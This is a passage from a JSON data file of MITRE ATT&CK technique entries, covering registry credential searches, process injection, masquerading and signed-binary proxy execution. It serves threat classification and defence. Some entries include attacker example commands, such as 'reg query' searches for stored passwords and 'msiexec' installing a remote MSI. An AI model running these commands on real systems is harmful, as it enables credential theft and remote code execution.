Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018) The data contained in disk structures may include the initial executable code for loading an operating system or the location of the file system partitions on disk. If this information is not present, the computer will not be able to load an operating system during the boot process, leaving the computer unavailable. [Disk Structure Wipe](https://attack.mitre.org/techniques/T1487) may be performed in isolation, or along with [Disk Content Wipe](https://attack.mitre.org/techniques/T1488) if all sectors of a disk are wiped.\n\nTo maximize impact on the target organization, malware designed for destroying disk structures may have worm-like features to propagate across a network by leveraging other techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [Credential Dumping](https://attack.mitre.org/techniques/T1003), and [Windows Admin Shares](https://attack.mitre.org/techniques/T1077).(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)","tactics":["impact"],"externalId":"T1487","externalUrl":"https://attack.mitre.org/techniques/T1487"},"key":"mitre/disk-structure-wipe"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Credentials in Registry","version":"1.0","description":"The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.\n\nExample commands to find Registry keys related to password information: (Citation: Pentestlab Stored Credentials)\n\n* Local Machine Hive: reg query HKLM /f password /t REG_SZ /s\n* Current User Hive: reg query HKCU /f password /t REG_SZ /s","tactics":["credential-access"],"externalId":"T1214","externalUrl":"https://attack.mitre.org/techniques/T1214"},"key":"mitre/credentials-in-registry"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Automated Collection","version":"1.0","description":"Once established within a system or network, an adversary may use automated techniques for collecting internal data. Methods for performing this technique could include use of [Scripting](https://attack.mitre.org/techniques/T1064) to search for and copy information fitting set criteria such as file type, location, or name at specific time intervals. This functionality could also be built into remote access tools. \n\nThis technique may incorporate use of other techniques such as [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) and [Remote File Copy](https://attack.mitre.org/techniques/T1105) to identify and move files.","tactics":["collection"],"externalId":"T1119","externalUrl":"https://attack.mitre.org/techniques/T1119"},"key":"mitre/automated-collection"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Clipboard Data","version":"1.0","description":"Adversaries may collect data stored in the Windows clipboard from users copying information within or between applications. \n\n### Windows\n\nApplications can access clipboard data by using the Windows API. (Citation: MSDN Clipboard) \n\n### Mac\n\nOSX provides a native command, pbpaste, to grab clipboard contents  (Citation: Operating with EmPyre).","tactics":["collection"],"externalId":"T1115","externalUrl":"https://attack.mitre.org/techniques/T1115"},"key":"mitre/clipboard-data"},{"type":"mitre","subtype":"technique","metadata":{"technique":"AppInit DLLs","version":"1.0","description":"Dynamic-link libraries (DLLs) that are specified in the AppInit_DLLs value in the Registry keys HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows or HKEY_LOCAL_MACHINE\\Software\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Windows are loaded by user32.dll into every process that loads user32.dll. In practice this is nearly every program, since user32.dll is a very common library. (Citation: Endgame Process Injection July 2017) Similar to [Process Injection](https://attack.mitre.org/techniques/T1055), these values can be abused to obtain persistence and privilege escalation by causing a malicious DLL to be loaded and run in the context of separate processes on the computer. (Citation: AppInit Registry)\n\nThe AppInit DLL functionality is disabled in Windows 8 and later versions when secure boot is enabled. (Citation: AppInit Secure Boot)","tactics":["persistence","privilege-escalation"],"externalId":"T1103","externalUrl":"https://attack.mitre.org/techniques/T1103"},"key":"mitre/appinit-dlls"},{"type":"mitre","subtype":"technique","metadata":{"technique":"System Service Discovery","version":"1.0","description":"Adversaries may try to get information about registered services. Commands that may obtain information about services using operating system utilities are \"sc,\" \"tasklist /svc\" using [Tasklist](https://attack.mitre.org/software/S0057), and \"net start\" using [Net](https://attack.mitre.org/software/S0039), but adversaries may also use other tools as well.","tactics":["discovery"],"externalId":"T1007","externalUrl":"https://attack.mitre.org/techniques/T1007"},"key":"mitre/system-service-discovery"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Network Sniffing","version":"1.0","description":"Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.\n\nData captured via this technique may include user credentials, especially those sent over an insecure, unencrypted protocol. Techniques for name service resolution poisoning, such as [LLMNR/NBT-NS Poisoning and Relay](https://attack.mitre.org/techniques/T1171), can also be used to capture credentials to websites, proxies, and internal systems by redirecting traffic to an adversary.\n\nNetwork sniffing may also reveal configuration details, such as running services, version numbers, and other network characteristics (ex: IP addressing, hostnames, VLAN IDs) necessary for follow-on Lateral Movement and/or Defense Evasion activities.","tactics":["credential-access","discovery"],"externalId":"T1040","externalUrl":"https://attack.mitre.org/techniques/T1040"},"key":"mitre/network-sniffing"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Application Deployment Software","version":"1.0","description":"Adversaries may deploy malicious software to systems within a network using application deployment systems employed by enterprise administrators. The permissions required for this action vary by system configuration; local credentials may be sufficient with direct access to the deployment server, or specific domain credentials may be required. However, the system may require an administrative account to log in or to perform software deployment.\n\nAccess to a network-wide or enterprise-wide software deployment system enables an adversary to have remote code execution on all systems that are connected to such a system. The access may be used to laterally move to systems, gather information, or cause a specific effect, such as wiping the hard drives on all endpoints.","tactics":["lateral-movement"],"externalId":"T1017","externalUrl":"https://attack.mitre.org/techniques/T1017"},"key":"mitre/application-deployment-software"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Network Share Discovery","version":"1.0","description":"Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network. \n\n### Windows\n\nFile sharing over a Windows network occurs over the SMB protocol. (Citation: Wikipedia Shared Resource) (Citation: TechNet Shared Folder)\n\n[Net](https://attack.mitre.org/software/S0039) can be used to query a remote system for available shared drives using the net view \\\\remotesystem command. It can also be used to query shared drives on the local system using net share.\n\nAdversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement.\n\n### Mac\n\nOn Mac, locally mounted shares can be viewed with the df -aH command.","tactics":["discovery"],"externalId":"T1135","externalUrl":"https://attack.mitre.org/techniques/T1135"},"key":"mitre/network-share-discovery"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Peripheral Device Discovery","version":"1.0","description":"Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.","tactics":["discovery"],"externalId":"T1120","externalUrl":"https://attack.mitre.org/techniques/T1120"},"key":"mitre/peripheral-device-discovery"},{"type":"mitre","subtype":"technique","metadata":{"technique":"System Information Discovery","version":"1.0","description":"An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture.\n\n### Windows\n\nExample commands and utilities that obtain this information include ver, [Systeminfo](https://attack.mitre.org/software/S0096), and dir within [cmd](https://attack.mitre.org/software/S0106) for identifying information based on present files and directories.\n\n### Mac\n\nOn Mac, the systemsetup command gives a detailed breakdown of the system, but it requires administrative privileges. Additionally, the system_profiler gives a very detailed breakdown of configurations, firewall rules, mounted volumes, hardware, and many other things without needing elevated permissions.","tactics":["discovery"],"externalId":"T1082","externalUrl":"https://attack.mitre.org/techniques/T1082"},"key":"mitre/system-information-discovery"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Standard Application Layer Protocol","version":"1.0","description":"Adversaries may communicate using a common, standardized application layer protocol such as HTTP, HTTPS, SMTP, or DNS to avoid detection by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.\n\nFor connections that occur internally within an enclave (such as those between a proxy or pivot node and other nodes), commonly used protocols are RPC, SSH, or RDP.","tactics":["command-and-control"],"externalId":"T1071","externalUrl":"https://attack.mitre.org/techniques/T1071"},"key":"mitre/standard-application-layer-protocol"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Scheduled Task","version":"1.0","description":"Utilities such as [at](https://attack.mitre.org/software/S0110) and [schtasks](https://attack.mitre.org/software/S0111), along with the Windows Task Scheduler, can be used to schedule programs or scripts to be executed at a date and time. A task can also be scheduled on a remote system, provided the proper authentication is met to use RPC and file and printer sharing is turned on. Scheduling a task on a remote system typically required being a member of the Administrators group on the the remote system. (Citation: TechNet Task Scheduler Security)\n\nAn adversary may use task scheduling to execute programs at system startup or on a scheduled basis for persistence, to conduct remote Execution as part of Lateral Movement, to gain SYSTEM privileges, or to run a process under the context of a specified account.","tactics":["execution","persistence","privilege-escalation"],"externalId":"T1053","externalUrl":"https://attack.mitre.org/techniques/T1053"},"key":"mitre/scheduled-task"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Login Item","version":"1.0","description":"MacOS provides the option to list specific applications to run when a user logs in. These applications run under the logged in user's context, and will be started every time the user logs in. Login items installed using the Service Management Framework are not visible in the System Preferences and can only be removed by the application that created them (Citation: Adding Login Items). Users have direct control over login items installed using a shared file list which are also visible in System Preferences (Citation: Adding Login Items). These login items are stored in the user's ~/Library/Preferences/ directory in a plist file called com.apple.loginitems.plist (Citation: Methods of Mac Malware Persistence). Some of these applications can open visible dialogs to the user, but they don’t all have to since there is an option to ‘Hide’ the window. If an adversary can register their own login item or modified an existing one, then they can use it to execute their code for a persistence mechanism each time the user logs in (Citation: Malware Persistence on OS X) (Citation: OSX.Dok Malware). The API method  SMLoginItemSetEnabled  can be used to set Login Items, but scripting languages like [AppleScript](https://attack.mitre.org/techniques/T1155) can do this as well  (Citation: Adding Login Items).","tactics":["persistence"],"externalId":"T1162","externalUrl":"https://attack.mitre.org/techniques/T1162"},"key":"mitre/login-item"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Browser Extensions","version":"1.0","description":"Browser extensions or plugins are small programs that can add functionality and customize aspects of internet browsers. They can be installed directly or through a browser's app store. Extensions generally have access and permissions to everything that the browser can access. (Citation: Wikipedia Browser Extension) (Citation: Chrome Extensions Definition)\n\nMalicious extensions can be installed into a browser through malicious app store downloads masquerading as legitimate extensions, through social engineering, or by an adversary that has already compromised a system. Security can be limited on browser app stores so may not be difficult for malicious extensions to defeat automated scanners and be uploaded. (Citation: Malicious Chrome Extension Numbers) Once the extension is installed, it can browse to websites in the background, (Citation: Chrome Extension Crypto Miner) (Citation: ICEBRG Chrome Extensions) steal all information that a user enters into a browser, to include credentials, (Citation: Banker Google Chrome Extension Steals Creds) (Citation: Catch All Chrome Extension) and be used as an installer for a RAT for persistence. There have been instances of botnets using a persistent backdoor through malicious Chrome extensions. (Citation: Stantinko Botnet) There have also been similar examples of extensions being used for command & control  (Citation: Chrome Extension C2 Malware).","tactics":["persistence"],"externalId":"T1176","externalUrl":"https://attack.mitre.org/techniques/T1176"},"key":"mitre/browser-extensions"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Execution through API","version":"1.0","description":"Adversary tools may directly use the Windows application programming interface (API) to execute binaries. Functions such as the Windows API CreateProcess will allow programs and scripts to start other processes with proper path and argument parameters. (Citation: Microsoft CreateProcess)\n\nAdditional Windows API calls that can be used to execute binaries include: (Citation: Kanthak Verifier)\n\n* CreateProcessA() and CreateProcessW(),\n* CreateProcessAsUserA() and CreateProcessAsUserW(),\n* CreateProcessInternalA() and CreateProcessInternalW(),\n* CreateProcessWithLogonW(), CreateProcessWithTokenW(),\n* LoadLibraryA() and LoadLibraryW(),\n* LoadLibraryExA() and LoadLibraryExW(),\n* LoadModule(),\n* LoadPackagedLibrary(),\n* WinExec(),\n* ShellExecuteA() and ShellExecuteW(),\n* ShellExecuteExA() and ShellExecuteExW()","tactics":["execution"],"externalId":"T1106","externalUrl":"https://attack.mitre.org/techniques/T1106"},"key":"mitre/execution-through-api"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Service Registry Permissions Weakness","version":"1.0","description":"Windows stores local service configuration information in the Registry under HKLM\\SYSTEM\\CurrentControlSet\\Services. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe, PowerShell, or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys is controlled through Access Control Lists and permissions. (Citation: MSDN Registry Key Security)\n\nIf the permissions for users and groups are not properly set and allow access to the Registry keys for a service, then adversaries can change the service binPath/ImagePath to point to a different executable under their control. When the service starts or is restarted, then the adversary-controlled program will execute, allowing the adversary to gain persistence and/or privilege escalation to the account context the service is set to execute under (local/domain account, SYSTEM, LocalService, or NetworkService).\n\nAdversaries may also alter Registry keys associated with service failure parameters (such as FailureCommand) that may be executed in an elevated context anytime the service fails or is intentionally corrupted. (Citation: Twitter Service Recovery Nov 2017)","tactics":["persistence","privilege-escalation"],"externalId":"T1058","externalUrl":"https://attack.mitre.org/techniques/T1058"},"key":"mitre/service-registry-permissions-weakness"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Indirect Command Execution","version":"1.0","description":"Various Windows utilities may be used to execute commands, possibly without invoking [cmd](https://attack.mitre.org/software/S0106). For example, [Forfiles](https://attack.mitre.org/software/S0193), the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), as well as other utilities may invoke the execution of programs and commands from a [Command-Line Interface](https://attack.mitre.org/techniques/T1059), Run window, or via scripts. (Citation: VectorSec ForFiles Aug 2017) (Citation: Evi1cg Forfiles Nov 2017)\n\nAdversaries may abuse these features for [Defense Evasion](https://attack.mitre.org/tactics/TA0005), specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of [cmd](https://attack.mitre.org/software/S0106) or file extensions more commonly associated with malicious payloads.","tactics":["defense-evasion"],"externalId":"T1202","externalUrl":"https://attack.mitre.org/techniques/T1202"},"key":"mitre/indirect-command-execution"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Custom Cryptographic Protocol","version":"1.0","description":"Adversaries may use a custom cryptographic protocol or algorithm to hide command and control traffic. A simple scheme, such as XOR-ing the plaintext with a fixed key, will produce a very weak ciphertext.\n\nCustom encryption schemes may vary in sophistication. Analysis and reverse engineering of malware samples may be enough to discover the algorithm and encryption key used.\n\nSome adversaries may also attempt to implement their own version of a well-known cryptographic algorithm instead of using a known implementation library, which may lead to unintentional errors. (Citation: F-Secure Cosmicduke)","tactics":["command-and-control"],"externalId":"T1024","externalUrl":"https://attack.mitre.org/techniques/T1024"},"key":"mitre/custom-cryptographic-protocol"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Replication Through Removable Media","version":"1.0","description":"Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself.","tactics":["lateral-movement","initial-access"],"externalId":"T1091","externalUrl":"https://attack.mitre.org/techniques/T1091"},"key":"mitre/replication-through-removable-media"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Data from Local System","version":"1.0","description":"Sensitive data can be collected from local system sources, such as the file system or databases of information residing on the system prior to Exfiltration.\n\nAdversaries will often search the file system on computers they have compromised to find files of interest. They may do this using a [Command-Line Interface](https://attack.mitre.org/techniques/T1059), such as [cmd](https://attack.mitre.org/software/S0106), which has functionality to interact with the file system to gather information. Some adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on the local system.","tactics":["collection"],"externalId":"T1005","externalUrl":"https://attack.mitre.org/techniques/T1005"},"key":"mitre/data-from-local-system"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Deobfuscate/Decode Files or Information","version":"1.0","description":"Adversaries may use [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027) to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware, [Scripting](https://attack.mitre.org/techniques/T1064), [PowerShell](https://attack.mitre.org/techniques/T1086), or by using utilities present on the system.\n\nOne such example is use of [certutil](https://attack.mitre.org/software/S0160) to decode a remote access tool portable executable file that has been hidden inside a certificate file. (Citation: Malwarebytes Targeted Attack against Saudi Arabia)\n\nAnother example is using the Windows copy /b command to reassemble binary fragments into a malicious payload. (Citation: Carbon Black Obfuscation Sept 2016)\n\nPayloads may be compressed, archived, or encrypted in order to avoid detection.  These payloads may be used with [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027) during Initial Access or later to mitigate detection. Sometimes a user's action may be required to open it for deobfuscation or decryption as part of [User Execution](https://attack.mitre.org/techniques/T1204). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. (Citation: Volexity PowerDuke November 2016) Adversaries may also used compressed or archived scripts, such as Javascript.","tactics":["defense-evasion"],"externalId":"T1140","externalUrl":"https://attack.mitre.org/techniques/T1140"},"key":"mitre/deobfuscate-decode-files-or-information"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Supply Chain Compromise","version":"1.1","description":"Supply chain compromise is the manipulation of products or product delivery mechanisms prior to receipt by a final consumer for the purpose of data or system compromise. \n\nSupply chain compromise can take place at any stage of the supply chain including:\n\n* Manipulation of development tools\n* Manipulation of a development environment\n* Manipulation of source code repositories (public or private)\n* Manipulation of source code in open-source dependencies\n* Manipulation of software update/distribution mechanisms\n* Compromised/infected system images (multiple cases of removable media infected at the factory)\n* Replacement of legitimate software with modified versions\n* Sales of modified/counterfeit products to legitimate distributors\n* Shipment interdiction\n\nWhile supply chain compromise can impact any component of hardware or software, attackers looking to gain execution have often focused on malicious additions to legitimate software in software distribution or update channels. (Citation: Avast CCleaner3 2018) (Citation: Microsoft Dofoil 2018) (Citation: Command Five SK 2011) Targeting may be specific to a desired victim set (Citation: Symantec Elderwood Sept 2012) or malicious software may be distributed to a broad set of consumers but only move on to additional tactics on specific victims. (Citation: Avast CCleaner3 2018) (Citation: Command Five SK 2011) Popular open source projects that are used as dependencies in many applications may also be targeted as a means to add malicious code to users of the dependency. (Citation: Trendmicro NPM Compromise)","tactics":["initial-access"],"externalId":"T1195","externalUrl":"https://attack.mitre.org/techniques/T1195"},"key":"mitre/supply-chain-compromise"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Exploit Public-Facing Application","version":"1.1","description":"The use of software, data, or commands to take advantage of a weakness in an Internet-facing computer system or program in order to cause unintended or unanticipated behavior. The weakness in the system can be a bug, a glitch, or a design vulnerability. These applications are often websites, but can include databases (like SQL) (Citation: NVD CVE-2016-6662), standard services (like SMB (Citation: CIS Multiple SMB Vulnerabilities) or SSH), and any other applications with Internet accessible open sockets, such as web servers and related services. (Citation: NVD CVE-2014-7169) Depending on the flaw being exploited this may include [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211).\n\nFor websites and databases, the OWASP top 10 and CWE top 25 highlight the most common web-based vulnerabilities. (Citation: OWASP Top 10) (Citation: CWE top 25)","tactics":["initial-access"],"externalId":"T1190","externalUrl":"https://attack.mitre.org/techniques/T1190"},"key":"mitre/exploit-public-facing-application"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Remote Access Tools","version":"1.0","description":"An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be whitelisted within a target environment. Remote access tools like VNC, Ammy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n\nRemote access tools may be established and used post-compromise as alternate communications channel for [Redundant Access](https://attack.mitre.org/techniques/T1108) or as a way to establish an interactive remote desktop session with the target system. They may also be used as a component of malware to establish a reverse connection or back-connect to a service or adversary controlled system.\n\nAdmin tools such as TeamViewer have been used by several groups targeting institutions in countries of interest to the Russian state and criminal campaigns. (Citation: CrowdStrike 2015 Global Threat Report) (Citation: CrySyS Blog TeamSpy)","tactics":["command-and-control"],"externalId":"T1219","externalUrl":"https://attack.mitre.org/techniques/T1219"},"key":"mitre/remote-access-tools"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Multilayer Encryption","version":"1.0","description":"An adversary performs C2 communications using multiple layers of encryption, typically (but not exclusively) tunneling a custom encryption scheme within a protocol encryption scheme such as HTTPS or SMTPS.","tactics":["command-and-control"],"externalId":"T1079","externalUrl":"https://attack.mitre.org/techniques/T1079"},"key":"mitre/multilayer-encryption"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Masquerading","version":"1.1","description":"Masquerading occurs when the name or location of an executable, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. Several different variations of this technique have been observed.\n\nOne variant is for an executable to be placed in a commonly trusted directory or given the name of a legitimate, trusted program. Alternatively, the filename given may be a close approximation of legitimate programs or something innocuous. An example of this is when a common system utility or program is moved and renamed to avoid detection based on its usage.(Citation: FireEye APT10 Sept 2018) This is done to bypass tools that trust executables by relying on file name or path, as well as to deceive defenders and system administrators into thinking a file is benign by associating the name with something that is thought to be legitimate.\n\nA third variant uses the right-to-left override (RTLO or RLO) character (U+202E) as a means of tricking a user into executing what they think is a benign file type but is actually executable code. RTLO is a non-printing character that causes the text that follows it to be displayed in reverse.(Citation: Infosecinstitute RTLO Technique) For example, a Windows screensaver file named March 25 \\u202Excod.scr will display as March 25 rcs.docx. A JavaScript file named photo_high_re\\u202Egnp.js will be displayed as photo_high_resj.png. A common use of this technique is with spearphishing attachments since it can trick both end users and defenders if they are not aware of how their tools display and render the RTLO character. Use of the RTLO character has been seen in many targeted intrusion attempts and criminal activity.(Citation: Trend Micro PLEAD RTLO)(Citation: Kaspersky RTLO Cyber Crime) RTLO can be used in the Windows Registry as well, where regedit.exe displays the reversed characters but the command line tool reg.exe does not by default. \n\n### Windows\nIn another variation of this technique, an adversary may use a renamed copy of a legitimate utility, such as rundll32.exe. (Citation: Endgame Masquerade Ball) An alternative case occurs when a legitimate utility is moved to a different directory and also renamed to avoid detections based on system utilities executing from non-standard paths. (Citation: F-Secure CozyDuke)\n\nAn example of abuse of trusted locations in Windows would be the C:\\Windows\\System32 directory. Examples of trusted binary names that can be given to malicious binares include \"explorer.exe\" and \"svchost.exe\".\n\n### Linux\nAnother variation of this technique includes malicious binaries changing the name of their running process to that of a trusted or benign process, after they have been launched as opposed to before. (Citation: Remaiten)\n\nAn example of abuse of trusted locations in Linux  would be the /bin directory. Examples of trusted binary names that can be given to malicious binares include \"rsyncd\" and \"dbus-inotifier\". (Citation: Fysbis Palo Alto Analysis)  (Citation: Fysbis Dr Web Analysis)","tactics":["defense-evasion"],"externalId":"T1036","externalUrl":"https://attack.mitre.org/techniques/T1036"},"key":"mitre/masquerading"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Process Injection","version":"1.0","description":"Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.\n\n### Windows\n\nThere are multiple approaches to injecting code into a live process. Windows implementations include: (Citation: Endgame Process Injection July 2017)\n\n* **Dynamic-link library (DLL) injection** involves writing the path to a malicious DLL inside a process then invoking execution by creating a remote thread.\n* **Portable executable injection** involves writing malicious code directly into the process (without a file on disk) then invoking execution with either additional code or by creating a remote thread. The displacement of the injected code introduces the additional requirement for functionality to remap memory references. Variations of this method such as reflective DLL injection (writing a self-mapping DLL into a process) and memory module (map DLL when writing into process) overcome the address relocation issue. (Citation: Endgame HuntingNMemory June 2017)\n* **Thread execution hijacking** involves injecting malicious code or the path to a DLL into a thread of a process. Similar to [Process Hollowing](https://attack.mitre.org/techniques/T1093), the thread must first be suspended.\n* **Asynchronous Procedure Call** (APC) injection involves attaching malicious code to the APC Queue (Citation: Microsoft APC) of a process's thread. Queued APC functions are executed when the thread enters an alterable state. A variation of APC injection, dubbed \"Early Bird injection\", involves creating a suspended process in which malicious code can be written and executed before the process' entry point (and potentially subsequent anti-malware hooks) via an APC. (Citation: CyberBit Early Bird Apr 2018)  AtomBombing  (Citation: ENSIL AtomBombing Oct 2016) is another variation that utilizes APCs to invoke malicious code previously written to the global atom table. (Citation: Microsoft Atom Table)\n* **Thread Local Storage** (TLS) callback injection involves manipulating pointers inside a portable executable (PE) to redirect a process to malicious code before reaching the code's legitimate entry point. (Citation: FireEye TLS Nov 2017)\n\n### Mac and Linux\n\nImplementations for Linux and OS X/macOS systems include: (Citation: Datawire Code Injection) (Citation: Uninformed Needle)\n\n* **LD_PRELOAD, LD_LIBRARY_PATH** (Linux), **DYLD_INSERT_LIBRARIES** (Mac OS X) environment variables, or the dlfcn application programming interface (API) can be used to dynamically load a library (shared object) in a process which can be used to intercept API calls from the running process. (Citation: Phrack halfdead 1997)\n* **Ptrace system calls** can be used to attach to a running process and modify it in runtime. (Citation: Uninformed Needle)\n* **/proc/[pid]/mem** provides access to the memory of the process and can be used to read/write arbitrary data to it. This technique is very rare due to its complexity. (Citation: Uninformed Needle)\n* **VDSO hijacking** performs runtime injection on ELF binaries by manipulating code stubs mapped in from the linux-vdso.so shared object. (Citation: VDSO hijack 2009)\n\nMalware commonly utilizes process injection to access system resources through which Persistence and other environment modifications can be made. More sophisticated samples may perform multiple process injections to segment modules and further evade detection, utilizing named pipes or other inter-process communication (IPC) mechanisms as a communication channel.","tactics":["defense-evasion","privilege-escalation"],"externalId":"T1055","externalUrl":"https://attack.mitre.org/techniques/T1055"},"key":"mitre/process-injection"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Bash History","version":"1.0","description":"Bash keeps track of the commands users type on the command-line with the \"history\" utility. Once a user logs out, the history is flushed to the user’s .bash_history file. For each user, this file resides at the same location: ~/.bash_history. Typically, this file keeps track of the user’s last 500 commands. Users often type usernames and passwords on the command-line as parameters to programs, which then get saved to this file when they log out. Attackers can abuse this by looking through the file for potential credentials. (Citation: External to DA, the OS X Way)","tactics":["credential-access"],"externalId":"T1139","externalUrl":"https://attack.mitre.org/techniques/T1139"},"key":"mitre/bash-history"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Port Knocking","version":"1.0","description":"Port Knocking is a well-established method used by both defenders and adversaries to hide open ports from access. To enable a port, an adversary sends a series of packets with certain characteristics before the port will be opened. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports, but can involve unusual flags, specific strings or other unique characteristics. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software. \n\nThis technique has been observed to both for the dynamic opening of a listening port as well as the initiating of a connection to a listening server on a different system.\n\nThe observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r (Citation: Hartrell cd00r 2002), is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs.","tactics":["defense-evasion","persistence","command-and-control"],"externalId":"T1205","externalUrl":"https://attack.mitre.org/techniques/T1205"},"key":"mitre/port-knocking"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Signed Binary Proxy Execution","version":"2.0","description":"Binaries signed with trusted digital certificates can execute on Windows systems protected by digital signature validation. Several Microsoft signed binaries that are default on Windows installations can be used to proxy execution of other files. This behavior may be abused by adversaries to execute malicious files that could bypass application whitelisting and signature validation on systems. This technique accounts for proxy execution methods that are not already accounted for within the existing techniques.\n\n### Msiexec.exe\nMsiexec.exe is the command-line Windows utility for the Windows Installer. Adversaries may use msiexec.exe to launch malicious MSI files for code execution. An adversary may use it to launch local or network accessible MSI files.(Citation: LOLBAS Msiexec)(Citation: Rancor Unit42 June 2018)(Citation: TrendMicro Msiexec Feb 2018) Msiexec.exe may also be used to execute DLLs.(Citation: LOLBAS Msiexec)\n\n* msiexec.exe /q /i \"C:\\path\\to\\file.msi\"\n* msiexec.exe /q /i http[:]//site[.]com/file.msi\n* msiexec.exe /y \"C:\\path\\to\\file.dll\"\n\n### Mavinject.exe\nMavinject.exe is a Windows utility that allows for code execution. Mavinject can be used to input a DLL into a running process. (Citation: Twitter gN3mes1s Status Update MavInject32)\n\n* \"C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\MavInject32.exe\" <PID> /INJECTRUNNING <PATH DLL>\n* C:\\Windows\\system32\\mavinject.exe <PID> /INJECTRUNNING <PATH DLL>\n\n### SyncAppvPublishingServer.exe\nSyncAppvPublishingServer.exe can be used to run PowerShell scripts without executing powershell.exe. (Citation: Twitter monoxgas Status Update SyncAppvPublishingServer)\n\n### Odbcconf.exe\nOdbcconf.exe is a Windows utility that allows you to configure Open Database Connectivity (ODBC) drivers and data source names.(Citation: Microsoft odbcconf.exe) The utility can be misused to execute functionality equivalent to [Regsvr32](https://attack.mitre.org/techniques/T1117) with the REGSVR option to execute a DLL.(Citation: LOLBAS Odbcconf)(Citation: TrendMicro Squiblydoo Aug 2017)(Citation: TrendMicro Cobalt Group Nov 2017)\n\n* odbcconf.exe /S /A &lbraceREGSVR \"C:\\Users\\Public\\file.dll\"&rbrace\n\nSeveral other binaries exist that may be used to perform similar behavior. (Citation: GitHub Ultimate AppLocker Bypass List)","tactics":["defense-evasion","execution"],"externalId":"T1218","externalUrl":"https://attack.mitre.org/techniques/T1218"},"key":"mitre/signed-binary-proxy-execution"},{"type":"mitre","subtype":"technique","metadata":{"technique":"Source","version":"1.0","description":"The source command loads functions into the current shell or executes files in the current context. This built-in command can be run in two different ways source /path/to/filename [arguments] or . /path/to/filename [arguments]. Take note of the space after the \".\". Without a space, a new shell is created that runs the program instead of running the program within the current context. This is often used to make certain features or functions available to a shell or to update a specific shell's environment. \n\nAdversaries can abuse this functionality to execute programs. The file executed with this technique does not need to be marked executable beforehand.","tactics":["execution"],"externalId":"T1153","externalUrl":"https://attack.mitre.org/techniques/T1153"},"key":"mitre/source"},{"type":"mitre","subtype":"technique","metadata":{"technique":"DLL Search Order 